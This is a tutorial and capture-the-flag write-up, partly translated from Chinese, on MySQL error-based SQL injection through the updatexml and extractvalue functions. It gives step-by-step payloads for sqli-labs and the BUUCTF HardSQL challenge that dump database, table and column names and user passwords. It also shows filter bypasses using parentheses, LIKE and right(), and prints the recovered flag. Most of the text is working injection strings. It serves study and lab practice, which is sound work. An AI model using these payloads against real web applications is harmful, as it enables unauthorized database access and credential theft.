sql error injection

SQL error injection

​ Error injection is to use certain mechanisms of the database to artificially create error conditions so that the query results can appear in the error message.

xpath syntax error (limitations)

extractvalue is responsible for querying the content of the node in the xml document according to the xpath syntax, and updatexml is responsible for modifying the queried content:

updatexml

Function prototype: updatexml(xml_document,xpath_string,new_value)
Normal syntax: updatexml(xml_document,xpath_string,new_value) The
first parameter: xml_document is the string format, which is the name of the xml document object. The second parameter: xpath_string is a string in xpath format.
The third parameter: new_value is in string format, which replaces the data of the load condition found. Function: Change the value of the node that meets the condition in the document

The second parameter is a string that is required to conform to the xpath syntax. If it does not meet the requirements, an error will be reported, and the query result will be placed in the error message, so it can be used.

Example: sqli-labs

Less-5?id=1' or updatexml(1,concat(0x7e,database(),0x7e),1)--+       爆库

Less-5?id=1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+       爆表

Less-5?id=1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+                                        爆列

Less-5?id=1' or updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)--+                                                      爆数据                             

PS: The maximum length of updatexml is 32 bits, so it is limited. If the length exceeds 32 bits, it will not be displayed.

to sum up:

爆数据库名：'and(select updatexml(1,concat(0x7e,(select database())),0x7e))

爆表名：'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))

爆列名：'and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))

爆数据：'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

extractvalue function

Function prototype: extractvalue (xml_document, Xpath_string)
normal grammatical: extractvalue (xml_document, Xpath_string);
first parameter: xml_document a string format, the document object name xml
second parameter: Xpath_string is formatted string xpath
effect: from Return a string containing the query value in the target xml

查数据库名：id='and(select extractvalue(1,concat(0x7e,(select database()))))

爆表名：id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

爆字段名：id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))

爆数据：id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

BUUCTF-[Geek Challenge 2019] HardSQL (error injection)

1. After using bp fuzz, union|order by|equal sign|space|substr, etc. are filtered, and the space is not filtered, which is roughly an impression

2. Explode the current database name:
bypass the space: just wrap it in parentheses ()

admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=21

-> Library name: geek
3. Explosive table name:
Equal sign bypass: Replace with like

admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=21

->Table name: H4rDsq1
4. Field name:

admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=21

->Field: id,username,password
5.

'or(extractvalue(1,concat('~',(select(password)from(H4rDsq1)))))#

flag{9f09946d-4c83-40f5-982
did not show the whole picture. At
this time, we have to think of some mysql functions, substr, left, right.
Note: substr is filtered

admin'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=21

Result: XPATH syntax error: ' _{3-40f5-9828-9593ee5f3f4c)} '

The result after splicing:
flag{9f09946d-4c83-40f5-9828-9593ee5f3f4c}